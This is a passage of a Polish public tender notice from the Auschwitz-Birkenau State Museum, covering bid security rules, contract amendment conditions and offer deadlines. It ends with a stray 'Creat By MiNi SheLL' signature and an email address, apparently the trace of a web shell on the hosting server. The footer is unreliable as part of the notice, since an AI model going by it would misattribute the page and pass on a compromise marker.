i 3 oraz ust. 2 Pzp. <br/>3.	Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku następujących formach: <br/>3.1.	Pieniądzu, <br/>3.2.	Gwarancjach bankowych, <br/>3.3.	Gwarancjach ubezpieczeniowych, <br/>3.4.	Poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. 4. <br/>4.	W przypadku wniesienia wadium w formach określonych powyżej w ppkt 3.2.- 3.4., dokument winien być wystawiony na Państwowe Muzeum Auschwitz-Birkenau w Oświęcimiu, ul. Więźniów Oświęcimia 20, 32-600 Oświęcim i dołączony do oferty Wykonawcy.<br/>5.	Wadium w formie pieniężnej wpłaca się przelewem na rachunek bankowy Zamawiającego:<br/>Bank Gospodarstwa Krajowego, Swift: GOSKPLPW, <br/>Konto PL 80 1130 1150 0012 1268 9790 0005<br/>6.	Wnosząc wadium Wykonawca winien powołać się na nazwę niniejszego postępowania oraz nr nadany postępowaniu przez Zamawiającego.<br/>7.	Wadium w formie niepieniężnej: <br/>7.1.	Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej. <br/>7.2.	Treść dokumentu wadium winna zawierać nazwę niniejszego postępowania oraz nr nadany postępowaniu przez Zamawiającego. <br/>7.3.	Udzielona gwarancja: <br/>7.3.1.	musi być gwarancją samoistną, nieodwołalną, bezwarunkową i płatną na pierwsze żądanie, bez konieczności przedkładania jakichkolwiek dodatkowych dokumentów, <br/>7.3.2.	musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę określone w Pzp, <br/>7.3.3.	z jej treści powinno jednoznacznie wynikać zobowiązanie gwaranta do zapłaty Zamawiającemu całej kwoty wadium, <br/>7.3.4.	treść gwarancji nie może zawierać klauzuli zwalniającej gwaranta od odpowiedzialności wskutek zwrotu dokumentu gwarancji, <br/>7.3.5.	w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 Pzp), Zamawiający wymaga, aby poręczenie lub gwarancja obejmowała swą treścią wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia (tj. zobowiązanych z tytułu poręczenia lub gwarancji) lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców wspólnie ubiegających się o udzielenie zamówienia (np. konsorcjum).<br/>8.	Zasady zwrotu oraz okoliczności zatrzymania wadium określa art. 98 Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> WARUNKI ZMIANY UMOWY<br/>Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w stosunku do treści oferty.<br/>1. Strony mogą przedłużyć termin wykonania przedmiotu umowy określony w §3 ust. 1 lub terminy poszczególnych etapów określone w §3 ust. 1 i w §3 ust. 2 o czas opóźnienia, jeżeli takie opóźnienie jest lub będzie miało wpływ na realizację przedmiotu umowy w następujących przypadkach:<br/>1.1 jeżeli Zamawiający, w związku z koniecznością weryfikacji proponowanych przez Wykonawcę rozwiązań projektowych innych niż określone w umowie (koncepcje) lub z innych ważnych przyczyn, nie dających się przewidzieć w chwili zawarcia umowy, wstrzyma wykonywanie prac – w takim przypadku termin realizacji przedmiotu umowy zostanie przesunięty o ilość dni równą okresowi wstrzymania prac,<br/>1.2 uniemożliwienia rozpoczęcia realizacji przedmiotu umowy lub wystąpienia przerw w wykonaniu przedmiotu umowy z przyczyn leżących po stronie Zamawiającego, termin realizacji umowy ulega przesunięciu o okres wynikający z przerw lub opóźnienia rozpoczęcia prac,<br/>1.3 jeżeli pomimo udokumentowanego wystąpienia przez Wykonawcę z właściwie przygotowanym wnioskiem o wydanie decyzji administracyjnych lub warunków technicznych lub innego dokumentu niezbędnego do prawidłowej realizacji przedmiotu umowy, w terminie przewidzianym w odrębnych przepisach organ administracji publicznej lub inna instytucja nie<br/>41<br/>wyda stosownego dokumentu. W takim przypadku termin wykonania przedmiotu umowy zostanie przesunięty o ilość dni opóźnienia w wydaniu stosownego dokumentu,<br/>1.4 wystąpienia Siły Wyższej, o której mowa w § 13 umowy,<br/>1.5 w przypadku konieczności wykonania dodatkowych badań i ekspertyz wynikłych w trakcie realizacji przedmiotu umowy lub wynikających z poleceń, zaleceń innych organów np. Państwowej Straży Pożarnej,<br/>1.6 W przypadku konieczności wykonania przez Wykonawcę dokumentacji zamiennej.<br/>1.7 W przypadku odkrycia obiektów archeologicznych.<br/>1.8 W przypadku konieczności wykonania zabezpieczenia materiału zabytkowego, pozyskanego w trakcie prowadzonych prac.<br/>1.9 W przypadku zawarcia aneksu do umowy na podstawie art. 455 ustawy PZP w zakresie dozwolonej zmiany umowy, jeżeli zmiana będzie miała wpływ na terminy realizacji przedmiotu umowy.<br/>1.10 W przypadku zmiany terminów wykonywania robót budowlanych lub prac konserwatorskich wykonywanych na podstawie Dokumentacji, mającej wpływ na termin pełnienia przez Wykonawcę nadzoru autorskiego.<br/>1.11 Wystąpienia innych przyczyn leżących po stronie Zamawiającego.<br/>2. Strony dokonają zmiany wysokości wynagrodzenia należnego Wykonawcy każdorazowo w przypadku wystąpienia jednej z następujących okoliczności:<br/>2.1 zmiany stawki podatku od towarów i usług,<br/>2.2 zmiany wysokości minimalnego wynagrodzenia ustalonego na podstawie przepisów o minimalnym wynagrodzeniu za pracę,<br/>2.3 zmiany zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub zdrowotne,<br/>2.4 wprowadzenia minimalnej stawki za roboczogodzinę od umów cywilnoprawnych na podstawie powszechnie obowiązujących przepisów prawa - jeżeli zmiany te będą miały wpływ na koszty wykonania umowy przez Wykonawcę,<br/>2.5 zmiany zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których mowa w ustawie z dnia 4 października 2018 r. o pracowniczych planach kapitałowych (tj. Dz. U. z 2020r. poz. 1342 ze zm.), z zastrzeżeniem, że dotyczy to wyłącznie zamiany zasad wprowadzonych na szczeblu ustawowym. Niniejsza przesłanka nie będzie miała zastosowania do zmiany zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych poczynionych na szczeblu wykonawca (pracodawca) - pracownik.<br/>3. Zmiana wysokości wynagrodzenia należnego Wykonawcy w przypadku zaistnienia przesłanki, o której mowa w ust. 2 pkt 2.1, będzie odnosić się wyłącznie do części przedmiotu umowy zrealizowanej, zgodnie z terminami ustalonymi umową, po dniu wejścia w życie przepisów zmieniających stawkę podatku. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-10-10 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">1.	Złożenie oferty wraz z oświadczeniem z art. 125 ust. 1 Pzp i innymi dokumentami wymienionymi w Dziale XI pkt 10 SWZ oraz jej wycofanie odbywa się przy użyciu miniPortalu zamieszczonego na stronie internetowej https://miniportal.uzp.gov.pl/ System miniPortal zapewnia bezpłatną możliwość szyfrowania ofert. 2.	Wymagania techniczne i organizacyjne wysyłania oraz odbierania dokumentów</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-10-10 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-11-08</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com